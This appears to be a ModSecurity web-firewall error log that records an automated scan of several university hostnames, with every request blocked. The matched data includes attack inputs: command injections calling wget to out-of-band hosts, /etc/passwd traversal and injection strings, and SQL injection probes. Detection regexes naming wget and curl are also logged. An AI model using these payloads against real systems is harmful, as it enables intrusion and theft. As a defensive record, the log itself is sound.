[Tue Aug 29 11:33:31.296252 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "informatika.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11G8Co-f0AAAQKOlgAAAAs"]
[Tue Aug 29 11:33:31.349503 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11G8Co-f0AAAQKOlkAAAAs"]
[Tue Aug 29 11:33:31.352745 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ` found within XML: \\x0a    \\x0a    foo\\x0a    \\x0a        \\x0a            \\x0a                2\\x0a                \\x0a                    \\x0a                        \\x0a                            mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x0a                            \\x0a                                \\x0a                                \\x0a                                Compare\\x0a                                \\x0a                                \\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTA [hostname "journal.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11G8Co-f0AAAQKOlkAAAAs"]
[Tue Aug 29 11:33:31.373446 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:logName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/enginemanager/server/logs/download"] [unique_id "ZO11G8Co-f0AAAQKOloAAAAs"]
[Tue Aug 29 11:33:32.023593 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username:  `cat/etc/passwd`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/login"] [unique_id "ZO11HMCo-f0AAARv7SQAAAAY"]
[Tue Aug 29 11:33:32.029739 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username:  `cat/etc/passwd`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login"] [unique_id "ZO11HMCo-f0AAARfwmcAAAAI"]
[Tue Aug 29 11:33:32.051170 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username:  `cat/etc/passwd`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/login"] [unique_id "ZO11HMCo-f0AAANsAg4AAAAD"]
[Tue Aug 29 11:33:32.055010 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username:  `cat/etc/passwd`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/login"] [unique_id "ZO11HMCo-f0AAASBXOwAAAAM"]
[Tue Aug 29 11:33:32.072720 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username:  `cat/etc/passwd`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/login"] [unique_id "ZO11HMCo-f0AAARo8zgAAAAT"]
[Tue Aug 29 11:33:32.124772 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ;'wget http:/cjmn8l5jmimk2adbbnlgi9p9c9fnwjjiu.oast.site;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/cgi-bin/mesh.cgi"] [unique_id "ZO11HMCo-f0AAARo8zoAAAAT"]
[Tue Aug 29 11:33:32.132139 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ;'wget http:/cjmn8l5jmimk2adbbnlgswpdq7nxek7rt.oast.site;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/mesh.cgi"] [unique_id "ZO11HMCo-f0AAARfwmwAAAAI"]
[Tue Aug 29 11:33:32.132208 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ;'wget http:/cjmn8l5jmimk2adbbnlgo1jdfpdis55oh.oast.site;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/mesh.cgi"] [unique_id "ZO11HMCo-f0AAANsAhIAAAAD"]
[Tue Aug 29 11:33:32.144915 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ;'wget http:/cjmn8l5jmimk2adbbnlgoye7ipg4qyis9.oast.site;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/mesh.cgi"] [unique_id "ZO11HMCo-f0AAASAHY8AAAAH"]
[Tue Aug 29 11:33:32.145464 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/forum/forumrunner/request.php"] [unique_id "ZO11HMCo-f0AAARo8zsAAAAT"]
[Tue Aug 29 11:33:32.314521 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username:  `cat/etc/passwd`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/login"] [unique_id "ZO11HMCo-f0AAASAHZIAAAAH"]
[Tue Aug 29 11:33:32.339025 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ;'wget http:/cjmn8l5jmimk2adbbnlgewfepj8g6me3m.oast.site;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/mesh.cgi"] [unique_id "ZO11HMCo-f0AAARy-vMAAAAb"]
[Tue Aug 29 11:33:32.359119 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO11HMCo-f0AAARfwnIAAAAI"]
[Tue Aug 29 11:33:32.359605 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO11HMCo-f0AAARy-vQAAAAb"]
[Tue Aug 29 11:33:32.366305 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO11HMCo-f0AAANsAhcAAAAD"]
[Tue Aug 29 11:33:32.381058 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO11HMCo-f0AAARv7TAAAAAY"]
[Tue Aug 29 11:33:32.420765 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO11HMCo-f0AAARy-vcAAAAb"]
[Tue Aug 29 11:33:32.461409 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ;'wget http:/cjmn8l5jmimk2adbbnlgycehqnuwe1s8z.oast.site;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/mesh.cgi"] [unique_id "ZO11HMCo-f0AAARy-vkAAAAb"]
[Tue Aug 29 11:33:33.368869 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/forums/forumrunner/request.php"] [unique_id "ZO11HcCo-f0AAARo80AAAAAT"]
[Tue Aug 29 11:33:34.313100 2023] [:error] [pid 1127] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/vb/forumrunner/request.php"] [unique_id "ZO11HsCo-f0AAARnmJ4AAAAR"]
[Tue Aug 29 11:33:34.344219 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/jexws/jexws.jsp"] [unique_id "ZO11HsCo-f0AAASBXQAAAAAM"]
[Tue Aug 29 11:33:34.344817 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/jexws/jexws.jsp"] [unique_id "ZO11HsCo-f0AAAR@KFsAAAAF"]
[Tue Aug 29 11:33:34.347671 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO11HsCo-f0AAARNk-sAAAAS"]
[Tue Aug 29 11:33:34.352079 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/jexws/jexws.jsp"] [unique_id "ZO11HsCo-f0AAARjjNgAAAAL"]
[Tue Aug 29 11:33:34.352479 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/jexws/jexws.jsp"] [unique_id "ZO11HsCo-f0AAAQKOmsAAAAs"]
